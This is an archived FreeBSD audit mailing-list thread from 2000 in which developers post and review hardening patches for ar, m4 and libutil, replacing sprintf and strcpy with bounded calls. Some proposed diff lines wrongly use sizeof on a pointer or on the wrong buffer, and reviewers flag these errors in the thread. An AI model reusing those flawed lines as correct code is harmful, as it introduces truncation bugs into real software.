<20001204201058.W570@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from fjoe@iclub.nsu.ru on Tue, Dec 05, 2000 at 08:43:26AM +0600 X-Operating-System: FreeBSD 4.1-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Tue, Dec 05, 2000 at 08:43:26AM +0600, Max Khon wrote: > p = cmd; > - p += sprintf(cmd, "exec %s", argv[0]); > + p += snprintf(cmd, sizeof(cmd), "exec %s", argv[0]); > for (i = 1; i <= nargs; i++) > - p += sprintf(p, " %c%d", magic, i); > + p += snprintf(p, sizeof(p), " %c%d", magic, i); > > sizeof(p) == sizeof(void *) (== 4 on i386) -- it is not what your tried to > achieve. also do not use strncpy/strncat instead of strcpy/strcat. in most > cases this is useless -- use strlcpy/strlcat instead Ah, ok. You have a point about the latter diff, what about the former? It seems a huge hole to allow a user to specify input via command-line -- even if it's the command itself (argv[0]). -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 19: 3: 4 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 19:03:03 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id B96A137B400 for ; Mon, 4 Dec 2000 19:03:03 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id TAA00413 for audit@FreeBSD.org; Mon, 4 Dec 2000 19:04:20 -0800 Date: Mon, 4 Dec 2000 19:04:20 -0800 From: kris@citusc.usc.edu To: audit@FreeBSD.org Subject: So much auditing! Message-ID: <20001204190420.A405@citusc.usc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3i Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Wow, I'm really impressed by the activity level here all of a sudden! I'm just sorry I'll be basically out of touch for the next few weeks that I'm in australia, and unable to review things myself. Keep up the good work, though! Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Tue Dec 5 4: 2:55 2000 From owner-freebsd-audit@FreeBSD.ORG Tue Dec 5 04:02:53 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from eeyore.local.dohd.org (d0030.upc-d.chello.nl [213.46.0.30]) by hub.freebsd.org (Postfix) with ESMTP id 2DEA837B400 for ; Tue, 5 Dec 2000 04:02:52 -0800 (PST) Received: by eeyore.local.dohd.org (Postfix, from userid 1008) id 7EC04BA0A; Tue, 5 Dec 2000 13:02:48 +0100 (MET) Date: Tue, 5 Dec 2000 13:02:48 +0100 From: Mark Huizer To: Will Andrews Cc: Max Khon , audit@FreeBSD.ORG Subject: Re: usr.bin audit patch Message-ID: <20001205130248.A5965@dohd.cx> References: <20001204201058.W570@puck.firepipe.net> <20001204214825.Z570@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <20001204214825.Z570@puck.firepipe.net>; from will@physics.purdue.edu on Mon, Dec 04, 2000 at 09:48:25PM -0500 Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG > > - p += sprintf(cmd, "exec %s", argv[0]); > > + p += snprintf(cmd, sizeof(cmd), "exec %s", argv[0]); > > for (i = 1; i <= nargs; i++) > > - p += sprintf(p, " %c%d", magic, i); > > + p += snprintf(p, sizeof(p), " %c%d", magic, i); > > > > sizeof(p) == sizeof(void *) (== 4 on i386) -- it is not what your tried to > > achieve. also do not use strncpy/strncat instead of strcpy/strcat. in most > > cases this is useless -- use strlcpy/strlcat instead > > Ah, ok. You have a point about the latter diff, what about the former? > It seems a huge hole to allow a user to specify input via command-line > -- even if it's the command itself (argv[0]). > In this case it doesn't matter that much, since cmd is malloced to be the correct size. Mark -- Nice testing in little China... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Tue Dec 5 5: 7:54 2000 From owner-freebsd-audit@FreeBSD.ORG Tue Dec 5 05:07:53 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 760A437B400 for ; Tue, 5 Dec 2000 05:07:52 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id E9F5818DB; Tue, 5 Dec 2000 08:07:49 -0500 (EST) Date: Tue, 5 Dec 2000 08:07:49 -0500 From: Will Andrews To: Mark Huizer Cc: Will Andrews , Max Khon , audit@FreeBSD.ORG Subject: Re: usr.bin audit patch Message-ID: <20001205080749.B563@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Mark Huizer , Max Khon , audit@FreeBSD.ORG References: <20001204201058.W570@puck.firepipe.net> <20001204214825.Z570@puck.firepipe.net> <20001205130248.A5965@dohd.cx> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001205130248.A5965@dohd.cx>; from freebsd@dohd.org on Tue, Dec 05, 2000 at 01:02:48PM +0100 X-Operating-System: FreeBSD 4.1-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Tue, Dec 05, 2000 at 01:02:48PM +0100, Mark Huizer wrote: > In this case it doesn't matter that much, since cmd is malloced to be > the correct size. Hmm, I didn't see a malloc. Thanks for pointing that out. I guess I'll spend a little more time and research next time. Thanks again.. -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Tue Dec 5 6:45:16 2000 From owner-freebsd-audit@FreeBSD.ORG Tue Dec 5 06:45:13 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 1EEE037B400 for ; Tue, 5 Dec 2000 06:45:13 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1000) id 66EF41360E; Tue, 5 Dec 2000 09:45:13 -0500 (EST) Date: Tue, 5 Dec 2000 09:45:13 -0500 From: Chris Faulhaber To: freebsd-audit@FreeBSD.org Subject: ar(1) patch Message-ID: <20001205094513.A47743@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , freebsd-audit@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG The following patch fixes a few calls in ar(1) (based on will's usr.bin patchset): - malloc()/strcpy() -> asprintf() - sprintf() -> snprintf() - strcpy() -> strlcpy() For more patches up for review, see: http://www.fxp.org/~jedgar/FreeBSD/diffs/ -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org Index: ar.c =================================================================== RCS file: /home/ncvs/src/usr.bin/ar/ar.c,v retrieving revision 1.8 diff -u -r1.8 ar.c --- ar.c 1999/08/28 00:59:07 1.8 +++ ar.c 2000/12/05 14:37:42 @@ -92,10 +92,8 @@ * Fix it, if necessary. */ if (*argv[1] != '-') { - if (!(p = malloc((u_int)(strlen(argv[1]) + 2)))) + if ((asprintf(&p, "-%s", argv[1])) == -1) err(1, NULL); - *p = '-'; - (void)strcpy(p + 1, argv[1]); argv[1] = p; } Index: archive.c =================================================================== RCS file: /home/ncvs/src/usr.bin/ar/archive.c,v retrieving revision 1.10 diff -u -r1.10 archive.c --- archive.c 1998/12/06 07:36:44 1.10 +++ archive.c 2000/12/05 14:37:42 @@ -225,18 +225,18 @@ name, OLDARMAXNAME, name); (void)fflush(stderr); } - (void)sprintf(hb, HDR3, name, + (void)snprintf(hb, sizeof(hb), HDR3, name, (long)sb->st_mtimespec.tv_sec, sb->st_uid, sb->st_gid, sb->st_mode, sb->st_size, ARFMAG); lname = 0; } else if (lname > sizeof(hdr->ar_name) || strchr(name, ' ')) - (void)sprintf(hb, HDR1, AR_EFMT1, lname, + (void)snprintf(hb, sizeof(hb), HDR1, AR_EFMT1, lname, (long)sb->st_mtimespec.tv_sec, sb->st_uid, sb->st_gid, sb->st_mode, sb->st_size + lname, ARFMAG); else { lname = 0; - (void)sprintf(hb, HDR2, name, + (void)snprintf(hb, sizeof(hb), HDR2, name, (long)sb->st_mtimespec.tv_sec, sb->st_uid, sb->st_gid, sb->st_mode, sb->st_size, ARFMAG); } Index: misc.c =================================================================== RCS file: /home/ncvs/src/usr.bin/ar/misc.c,v retrieving revision 1.6 diff -u -r1.6 misc.c --- misc.c 1998/12/06 07:36:44 1.6 +++ misc.c 2000/12/05 14:37:42 @@ -70,9 +70,9 @@ } if (envtmp) - (void)sprintf(path, "%s/%s", envtmp, _NAME_ARTMP); + (void)snprintf(path, sizeof(path), "%s/%s", envtmp, _NAME_ARTMP); else - strcpy(path, _PATH_ARTMP); + strlcpy(path, _PATH_ARTMP, sizeof(path)); sigfillset(&set); (void)sigprocmask(SIG_BLOCK, &set, &oset); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Tue Dec 5 17: 1:50 2000 From owner-freebsd-audit@FreeBSD.ORG Tue Dec 5 17:01:48 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 844) id D8D3037B400; Tue, 5 Dec 2000 17:01:48 -0800 (PST) Date: Tue, 5 Dec 2000 17:01:48 -0800 From: Nathan Ahlstrom To: audit@FreeBSD.org Subject: m4 patches for review Message-ID: <20001205170148.A98809@FreeBSD.ORG> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG I have merged in the NetBSD changes to usr.bin/m4 and have addressed the issues listed on jedgar's web page. Listed below: (1) check strdup(3) return values (2) check malloc(3) return values (3) check asprintf(3) return values (4) str(cpy|cat)/sprintf(3) -> strl(cpy|cat)/snprintf/asprintf(3) (5) mktemp(3) -> mkstemp(3) (6) [MAXPATHLEN + 1] -> [MAXPATHLEN] The code can be found at: http://people.FreeBSD.org/~nra/freebsd.m4.diff Comments/Suggestions/Reviews are welcome and needed! Thanks. Nathan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Tue Dec 5 19:15:56 2000 From owner-freebsd-audit@FreeBSD.ORG Tue Dec 5 19:15:53 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id C958537B400 for ; Tue, 5 Dec 2000 19:15:46 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 3B57A18BD; Tue, 5 Dec 2000 22:15:46 -0500 (EST) Date: Tue, 5 Dec 2000 22:15:46 -0500 From: Will Andrews To: audit@FreeBSD.org Subject: audit code being submitted lately.. Message-ID: <20001205221546.C575@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , audit@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Hi all, I'm curious, at what point will all this audited code get committed? It needs to settle in -current for awhile. I'd say commit it all to -current and see how things go. -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Tue Dec 5 19:53:48 2000 From owner-freebsd-audit@FreeBSD.ORG Tue Dec 5 19:53:47 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from citusc.usc.edu (citusc.usc.edu [128.125.38.123]) by hub.freebsd.org (Postfix) with ESMTP id 6EAEA37B400 for ; Tue, 5 Dec 2000 19:53:46 -0800 (PST) Received: (from kris@localhost) by citusc.usc.edu (8.9.3/8.9.3) id TAA09570; Tue, 5 Dec 2000 19:55:02 -0800 Date: Tue, 5 Dec 2000 19:55:02 -0800 From: kris@citusc.usc.edu To: Will Andrews Cc: audit@FreeBSD.ORG Subject: Re: audit code being submitted lately.. Message-ID: <20001205195502.A9566@citusc.usc.edu> References: <20001205221546.C575@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3i In-Reply-To: <20001205221546.C575@puck.firepipe.net> Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Tue, Dec 05, 2000 at 10:15:46PM -0500, Will Andrews wrote: > Hi all, > > I'm curious, at what point will all this audited code get committed? It > needs to settle in -current for awhile. > > I'd say commit it all to -current and see how things go. At this stage most of the patches are at the stage of "proposed patches" and need to be audited by at least one other person to make sure they a) actually fix problems, b) don't miss anything, and c) don't break things. The more complex the patches the more people should ideally be auditing them..usually with my patches I feel comfortable committing them if at least 2 people whose skills I trust give the ok. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Tue Dec 5 19:56:16 2000 From owner-freebsd-audit@FreeBSD.ORG Tue Dec 5 19:56:14 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 3FD6137B400 for ; Tue, 5 Dec 2000 19:56:14 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id C53E818BD; Tue, 5 Dec 2000 22:56:11 -0500 (EST) Date: Tue, 5 Dec 2000 22:56:11 -0500 From: Will Andrews To: kris@citusc.usc.edu Cc: Will Andrews , audit@FreeBSD.ORG Subject: Re: audit code being submitted lately.. Message-ID: <20001205225611.D575@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , kris@citusc.usc.edu, audit@FreeBSD.ORG References: <20001205221546.C575@puck.firepipe.net> <20001205195502.A9566@citusc.usc.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001205195502.A9566@citusc.usc.edu>; from kris@citusc.usc.edu on Tue, Dec 05, 2000 at 07:55:02PM -0800 X-Operating-System: FreeBSD 4.2-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Tue, Dec 05, 2000 at 07:55:02PM -0800, kris@citusc.usc.edu wrote: > At this stage most of the patches are at the stage of "proposed > patches" and need to be audited by at least one other person to make > sure they a) actually fix problems, b) don't miss anything, and c) > don't break things. The more complex the patches the more people > should ideally be auditing them..usually with my patches I feel > comfortable committing them if at least 2 people whose skills I trust > give the ok. Ok. Who's on this list of "people whose skills" you trust? I'd like to go bother a couple people until they review these patches. :-) -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Wed Dec 6 3:24: 6 2000 From owner-freebsd-audit@FreeBSD.ORG Wed Dec 6 03:24:04 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 6970637B400; Wed, 6 Dec 2000 03:24:04 -0800 (PST) Received: from earth.causticlabs.com (oca-c1s2-09.mfi.net [209.26.94.56]) by peitho.fxp.org (Postfix) with ESMTP id 3C61513613; Wed, 6 Dec 2000 06:24:07 -0500 (EST) Received: by earth.causticlabs.com (Postfix, from userid 1000) id 344211F23; Wed, 6 Dec 2000 06:24:33 -0500 (EST) Date: Wed, 6 Dec 2000 06:24:33 -0500 From: Chris Faulhaber To: Nathan Ahlstrom Cc: audit@FreeBSD.org Subject: Re: m4 patches for review Message-ID: <20001206062433.D14433@earth.causticlabs.com> References: <20001205170148.A98809@FreeBSD.ORG> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001205170148.A98809@FreeBSD.ORG>; from nra@FreeBSD.ORG on Tue, Dec 05, 2000 at 05:01:48PM -0800 Sender: jedgar@earth.causticlabs.com Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Tue, Dec 05, 2000 at 05:01:48PM -0800, Nathan Ahlstrom wrote: > > I have merged in the NetBSD changes to usr.bin/m4 and have > addressed the issues listed on jedgar's web page. Listed below: > > (1) check strdup(3) return values > (2) check malloc(3) return values > (3) check asprintf(3) return values > (4) str(cpy|cat)/sprintf(3) -> strl(cpy|cat)/snprintf/asprintf(3) > (5) mktemp(3) -> mkstemp(3) > (6) [MAXPATHLEN + 1] -> [MAXPATHLEN] The fixes look fine. You might want to coordinate with asmodai (who is working on syncing other BSD changes) to see if he has worked in this area. Also, have you checked for any applicable OpenBSD updates? -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Wed Dec 6 7:55:21 2000 From owner-freebsd-audit@FreeBSD.ORG Wed Dec 6 07:55:18 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id EFA4D37B402 for ; Wed, 6 Dec 2000 07:55:17 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1000) id B11D21360E; Wed, 6 Dec 2000 10:55:23 -0500 (EST) Date: Wed, 6 Dec 2000 10:55:23 -0500 From: Chris Faulhaber To: freebsd-audit@FreeBSD.org Subject: libutil diff Message-ID: <20001206105523.A52977@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , freebsd-audit@FreeBSD.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG For today's diff, we present libutil: - sprintf() -> snprintf() - do not attempt to manipulate a malloc()'d struct if it is NULL - strcpy() -> strlcpy() I could not find any limits/restrictions on the variables used in the corrected sprintf()/strcpy() calls, so these seem safer. For more patches up for review, see: http://www.fxp.org/~jedgar/FreeBSD/diffs/ -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org Index: login_class.c =================================================================== RCS file: /home/ncvs/src/lib/libutil/login_class.c,v retrieving revision 1.15 diff -u -r1.15 login_class.c --- login_class.c 2000/07/14 13:56:07 1.15 +++ login_class.c 2000/12/06 15:05:31 @@ -91,8 +91,8 @@ rlim_t rcur = rlim.rlim_cur; rlim_t rmax = rlim.rlim_max; - sprintf(name_cur, "%s-cur", lr->what); - sprintf(name_max, "%s-max", lr->what); + snprintf(name_cur, sizeof(name_cur), "%s-cur", lr->what); + snprintf(name_max, sizeof(name_cur), "%s-max", lr->what); rcur = (*lr->who)(lc, lr->what, rcur, rcur); rmax = (*lr->who)(lc, lr->what, rmax, rmax); Index: property.c =================================================================== RCS file: /home/ncvs/src/lib/libutil/property.c,v retrieving revision 1.7 diff -u -r1.7 property.c --- property.c 2000/11/09 00:28:22 1.7 +++ property.c 2000/12/06 15:05:31 @@ -47,9 +47,11 @@ properties n; n = (properties)malloc(sizeof(struct _property)); - n->next = NULL; - n->name = name ? strdup(name) : NULL; - n->value = value ? strdup(value) : NULL; + if (n != NULL) { + n->next = NULL; + n->name = name ? strdup(name) : NULL; + n->value = value ? strdup(value) : NULL; + } return n; } Index: pty.c =================================================================== RCS file: /home/ncvs/src/lib/libutil/pty.c,v retrieving revision 1.10 diff -u -r1.10 pty.c --- pty.c 1999/08/28 00:05:51 1.10 +++ pty.c 2000/12/06 15:05:31 @@ -87,7 +87,7 @@ *amaster = master; *aslave = slave; if (name) - strcpy(name, line); + strlcpy(name, line, sizeof(name)); if (termp) (void) tcsetattr(slave, TCSAFLUSH, termp); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Wed Dec 6 8: 1: 2 2000 From owner-freebsd-audit@FreeBSD.ORG Wed Dec 6 08:01:01 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id EF40437B401 for ; Wed, 6 Dec 2000 08:01:00 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id 5A56713612; Wed, 6 Dec 2000 11:01:07 -0500 (EST) Date: Wed, 6 Dec 2000 11:01:07 -0500 From: Chris Faulhaber To: freebsd-audit@FreeBSD.org Subject: Re: libutil diff Message-ID: <20001206110107.D93425@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , freebsd-audit@FreeBSD.org References: <20001206105523.A52977@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001206105523.A52977@peitho.fxp.org>; from jedgar@fxp.org on Wed, Dec 06, 2000 at 10:55:23AM -0500 Sender: cdf.lists@fxp.org Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Wed, Dec 06, 2000 at 10:55:23AM -0500, Chris Faulhaber wrote: > - sprintf(name_cur, "%s-cur", lr->what); > - sprintf(name_max, "%s-max", lr->what); > + snprintf(name_cur, sizeof(name_cur), "%s-cur", lr->what); > + snprintf(name_max, sizeof(name_cur), "%s-max", lr->what); ^^^-- name_max -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Wed Dec 6 9:56:58 2000 From owner-freebsd-audit@FreeBSD.ORG Wed Dec 6 09:56:56 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from lennier.cc.vt.edu (lennier.cc.vt.edu [198.82.161.193]) by hub.freebsd.org (Postfix) with ESMTP id D8D0937B400 for ; Wed, 6 Dec 2000 09:56:55 -0800 (PST) Received: from mail.vt.edu (gkar.cc.vt.edu [198.82.161.190]) by lennier.cc.vt.edu (8.11.0/8.11.0) with ESMTP id eB6HusB465205; Wed, 6 Dec 2000 12:56:54 -0500 (EST) Received: from muriel.penguinpowered.com ([198.82.100.195]) by gkar.cc.vt.edu (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with ESMTP id <0G55009CKR6TAY@gkar.cc.vt.edu>; Wed, 6 Dec 2000 12:56:53 -0500 (EST) Date: Wed, 06 Dec 2000 12:56:53 -0500 (EST) From: Mike Heffner Subject: RE: libutil diff In-reply-to: <20001206105523.A52977@peitho.fxp.org> Sender: spock@muriel.penguinpowered.com To: Chris Faulhaber Cc: freebsd-audit@FreeBSD.org Message-id: MIME-version: 1.0 X-Mailer: XFMail 1.4.4 on FreeBSD Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 8bit X-Priority: 3 (Normal) Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On 06-Dec-2000 Chris Faulhaber wrote: | For today's diff, we present libutil: | | - sprintf() -> snprintf() | - do not attempt to manipulate a malloc()'d struct if it is NULL | - strcpy() -> strlcpy() | | I could not find any limits/restrictions on the variables used in | the corrected sprintf()/strcpy() calls, so these seem safer. | [snip] | | Index: pty.c | =================================================================== | RCS file: /home/ncvs/src/lib/libutil/pty.c,v | retrieving revision 1.10 | diff -u -r1.10 pty.c | --- pty.c 1999/08/28 00:05:51 1.10 | +++ pty.c 2000/12/06 15:05:31 | @@ -87,7 +87,7 @@ | *amaster = master; | *aslave = slave; | if (name) | - strcpy(name, line); | + strlcpy(name, line, sizeof(name)); name is a char* passed into the function, so therefore sizeof(name) == 4 The manpage states: If the argument name is not NULL, openpty() copies the pathname of the slave pty to this area. The caller is responsible for allocating the re- quired space in this array. I think it should also mention the length required for name (ie. sizeof(line)). -- Mike Heffner Blacksburg, VA ICQ# 882073 http://my.ispchannel.com/~mheffner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Wed Dec 6 11:14:15 2000 From owner-freebsd-audit@FreeBSD.ORG Wed Dec 6 11:14:13 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 60BB537B400 for ; Wed, 6 Dec 2000 11:14:12 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1000) id 4F2161360E; Wed, 6 Dec 2000 14:14:11 -0500 (EST) Date: Wed, 6 Dec 2000 14:14:11 -0500 From: Chris Faulhaber To: Mike Heffner Cc: freebsd-audit@FreeBSD.org Subject: Re: libutil diff Message-ID: <20001206141411.A21225@peitho.fxp.org> Mail-Followup-To: Chris Faulhaber , Mike Heffner , freebsd-audit@FreeBSD.org References: <20001206105523.A52977@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from mheffner@vt.edu on Wed, Dec 06, 2000 at 12:56:53PM -0500 Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Wed, Dec 06, 2000 at 12:56:53PM -0500, Mike Heffner wrote: > > On 06-Dec-2000 Chris Faulhaber wrote: > > [snip] > > | - strcpy(name, line); > | + strlcpy(name, line, > sizeof(name)); > > name is a char* passed into the function, so therefore sizeof(name) == 4 > > The manpage states: > > If the argument name is not NULL, openpty() copies the pathname of the > slave pty to this area. The caller is responsible for allocating the re- > quired space in this array. > > I think it should also mention the length required for name (ie. > sizeof(line)). > agreed -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Wed Dec 6 14:41:43 2000 From owner-freebsd-audit@FreeBSD.ORG Wed Dec 6 14:41:41 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.13]) by hub.freebsd.org (Postfix) with ESMTP id D71D637B400; Wed, 6 Dec 2000 14:41:40 -0800 (PST) Received: from tundra.winternet.com (nrahlstr@tundra.winternet.com [198.174.169.11]) by icicle.winternet.com (8.9.3/8.9.3mc) with ESMTP id QAA21571; Wed, 6 Dec 2000 16:41:39 -0600 (CST) SMTP "HELO" (ESMTP) greeting from tundra.winternet.com But _really_ from :: nrahlstr@tundra.winternet.com [198.174.169.11] SMTP "MAIL From" = nrahlstr@mail.winternet.com (Nathan Ahlstrom) SMTP "RCPT To" = Received: (from nrahlstr@localhost) by tundra.winternet.com (8.8.7/8.8.4) id QAA04836; Wed, 6 Dec 2000 16:41:38 -0600 (CST) Date: Wed, 6 Dec 2000 16:41:38 -0600 From: Nathan Ahlstrom To: Chris Faulhaber Cc: Nathan Ahlstrom , audit@FreeBSD.ORG Subject: Re: m4 patches for review Message-ID: <20001206164138.F4279@winternet.com> References: <20001205170148.A98809@FreeBSD.ORG> <20001206062433.D14433@earth.causticlabs.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <20001206062433.D14433@earth.causticlabs.com>; from jedgar@fxp.org on Wed, Dec 06, 2000 at 06:24:33AM -0500 Sender: nrahlstr@mail.winternet.com Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG Chris Faulhaber wrote: > On Tue, Dec 05, 2000 at 05:01:48PM -0800, Nathan Ahlstrom wrote: > > > > I have merged in the NetBSD changes to usr.bin/m4 and have > > addressed the issues listed on jedgar's web page. Listed below: > > > > (1) check strdup(3) return values > > (2) check malloc(3) return values > > (3) check asprintf(3) return values > > (4) str(cpy|cat)/sprintf(3) -> strl(cpy|cat)/snprintf/asprintf(3) > > (5) mktemp(3) -> mkstemp(3) > > (6) [MAXPATHLEN + 1] -> [MAXPATHLEN] > > The fixes look fine. You might want to coordinate with asmodai (who is > working on syncing other BSD changes) to see if he has worked in this > area. Also, have you checked for any applicable OpenBSD updates? It appears the OpenBSD group has made alot of updates as well. I will evaluate those tonight. -- Nathan Ahlstrom / nrahlstr@winternet.com / nra@FreeBSD.org / PGP: 0x67BC9D19 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Wed Dec 6 18:29:39 2000 From owner-freebsd-audit@FreeBSD.ORG Wed Dec 6 18:29:36 2000 